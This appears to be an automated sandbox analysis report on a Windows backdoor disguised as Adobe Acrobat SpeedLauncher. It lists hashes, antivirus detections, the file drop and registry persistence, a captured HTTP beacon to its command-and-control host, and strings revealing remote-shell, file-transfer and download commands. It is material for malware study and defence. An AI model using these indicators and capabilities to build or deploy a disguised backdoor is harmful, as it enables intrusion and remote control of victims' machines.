Analysis Date2014-01-03 11:02:52
MD5f4ed3b7a8a58453052db4b5be3707342
SHA1181f1dd75e95b47e178199c90d9872543fdd4529

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d1846d4f6e59b61c85cbe19b6e516d8c sha1: e61c108e54760f4f6e2527afa4dbca153c42e756 size: 11264
Section.rdata md5: 6356fbb46ece2cba555bbbf3db04c95d sha1: 546656aa751db6826535dff4d865a399ee6a13ff size: 3584
Section.data md5: e429b13ab6e7edf6be31052c97ccc546 sha1: 931b446d4b87c625cabb75de0556ef95771931ff size: 2560
Section.rsrc md5: 8fbfba501adb1c75c8a1c324872ad328 sha1: 94719d1b1a16013df1aa3fe0767cd76b9a6ca7b7 size: 1536
Timestamp2010-11-17 13:37:00
VersionLegalCopyright: Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights reserved
FileVersion: 9.0.0.332
CompanyName: Adobe Systems Incorporated
Comments:
ProductName: Adobe Acrobat
ProductVersion: 9, 0, 0, 0
FileDescription: Adobe Acrobat SpeedLauncher
OriginalFilename: AcroSpeedLaunch.exe
PackerMicrosoft Visual C++ v6.0
PEhash35fb281c5f462171ab2f2a96af23e2c56b514ad6
AVaviraTR/Downloader.Gen
AVclamavWin.Trojan.Agent-65195
AVmcafeeRDN/Downloader.a!bi
AVavgAgent2.BVRT
AVmsseBackdoor:Win32/Likseput.B

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe

Creates MutexGLOBAL\MSFT64
Winsock URLhttp://share.canoedaily.com/index/default.htm

Network Details:

DNSshare.canoedaily.com
Type: A
209.222.14.3
HTTP GEThttp://share.canoedaily.com/index/default.htm
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; COMPUTER-XXXXXX;Trident/4.0) 01:02
Flows TCP192.168.1.1:1031 ➝ 209.222.14.3:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782f64 65666175   GET /index/defau
0x00000010 (00016)   6c742e68 746d2048 5454502f 312e310d   lt.htm HTTP/1.1.
0x00000020 (00032)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000030 (00048)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000040 (00064)   69626c65 3b204d53 49452038 2e303b20   ible; MSIE 8.0; 
0x00000050 (00080)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000060 (00096)   434f4d50 55544552 2d585858 5858583b   COMPUTER-XXXXXX;
0x00000070 (00112)   54726964 656e742f 342e3029 2030313a   Trident/4.0) 01:
0x00000080 (00128)   3032200d 0a486f73 743a2073 68617265   02 ..Host: share
0x00000090 (00144)   2e63616e 6f656461 696c792e 636f6d0d   .canoedaily.com.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....


Strings
040904b0
9, 0, 0, 0
9.0.0.332
AcroSpeedLaunch.exe
Adobe Acrobat
Adobe Acrobat SpeedLauncher
Adobe Systems Incorporated
Comments
CompanyName
Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights reserved
FileDescription
FileVersion
LegalCopyright
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
%-24s %s
%-26s %5d
??2@YAPAXI@Z
??3@YAXPAX@Z
Accept:*/*
_acmdln
_adjust_fdiv
Adobe Reader Speed Launcher
ADVAPI32.dll
 and the PID is %d
\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe
AttachConsole
blc-dwd
border=
Cache-Control:max-age=0
Cache-Control:no-cache
CD-ROM		
CloseHandle
CloseServiceHandle
\cmd.exe
cmd.exe
CmdPath=
Computer:
%ComSpec%
CONIN$
Content-Length: %d
_controlfp
ControlService
ControlService failed!
CopyFileA
Create failed with %d!
CreateFileA
CreateMutexA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateProcess failed!
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
/C "%s"
__CxxFrameHandler
@.data
DefWindowProcA
DeleteFileA
DispatchMessageA
_EH_prolog
EnumServicesStatusExA
_except_handler3
ExitProcess
ExpandEnvironmentStringsA
Failed!
Failed with %d!
FileSize:	%d
Fixed		
GetComputerNameA
GetConsoleDisplayMode
GetCurrentProcess
GetDriveTypeA
GetExitCodeProcess
GetFileAttributesA
GetFileAttributes Error code: %d
GetFileSize
GetLastError
GetLocalTime
GetLogicalDrives
__getmainargs
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetStartupInfoA
GetSystemDirectoryA
GetSystemTime
GetTempFileNameA
GetTempPathA
geturl
GetUserNameA
GetUserNameExA
GetUserProfileDirectoryA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GLOBAL\MSFT64
<h1>Bad Request (Invalid Hostname)</h1>
HttpAddRequestHeadersA
HttpOpenRequestA
HttpSendRequestA
_initterm
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetQueryOptionA
InternetReadFile
InternetSetOptionA
Invalid		
KB968705.bat
KERNEL32.dll
list process failed!
list service failed!
lstrcatA
lstrlenA
MainWndClass
memcpy
memset
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %d.%d; %s;Trident/4.0) %02d:%02d 
Mozilla/5.0
MSVCRT.dll
OpenP failed with %d!
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenSCManager failed!
OpenServiceA
OpenService failed!
OpenT failed with %d!
__p__commode
PeekNamedPipe
__p__fmode
pidrun
Pragma:no-cache
Process32First
Process32Next
Process cmd.exe exited!
Program started!
Proxy-Connection:Keep-Alive
PVVVWV
QVVVPVV
Ramdisk		
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegisterClassExA
RegSetValueExA
Remote		
Removeable		
%*[^/]%*[/]%*[^/]%s
%s Connected!
Secur32.dll
Service does not exist!
Service doesn't start!
Service is running already!
Service started!
Service still running!
Service stopped!
Service stop pending!
__set_app_type
SetCurrentDirectoryA
SetFileTime
SetStdHandle
__setusermatherr
SHCreateDirectoryExA
SHELL32.dll
ShellExecuteA
Shell started fail!
Shell started successfully!
Shell started,wait to terminate it.....
Sleep Time:
Software\Microsoft\Windows\CurrentVersion\Run
So long!
sprintf
sscanf
Started already,
StartServiceA
StartService failed!
Start shell first.
strcat
strchr
_strcmpi
strcpy
strlen
_strnicmp
strrchr
strstr
Syntax error!
Syntax error!	Usage:	getf/putf FileName <N>
Syntax error!	Usage:	GetUrl URL FileName
Syntax error!	Usage:	kill </p|/s> <pid|ServiceName>
Syntax error!	Usage:	list </p|/s|/d>
Syntax error!	Usage:	start </p|/s> <filename|ServiceName>
SystemTimeToFileTime
t0V<#u
t4j SV3
\tasks
TerminateProcess
!This program cannot be run in DOS mode.
t:hLU@
t<Ht2Ht(Ht
Totally %d volumes found.
TranslateMessage
Unkown		
URLDownloadToFileA
urlmon.dll
USER32.dll
USERENV.dll
Volume on this computer:
Volume	Type		Volume Name
VPPPPh
VVhlQ@
VVVhX,@
WaitForSingleObject
whoami
width=
WININET.dll
WPhdR@
WriteConsoleInputA
WriteFile
_XcptFilter
YYh0U@
YYSSSSS
YYSSSVSS
YYt5j\
YYWWVh
YYWWVh93@
ZRichw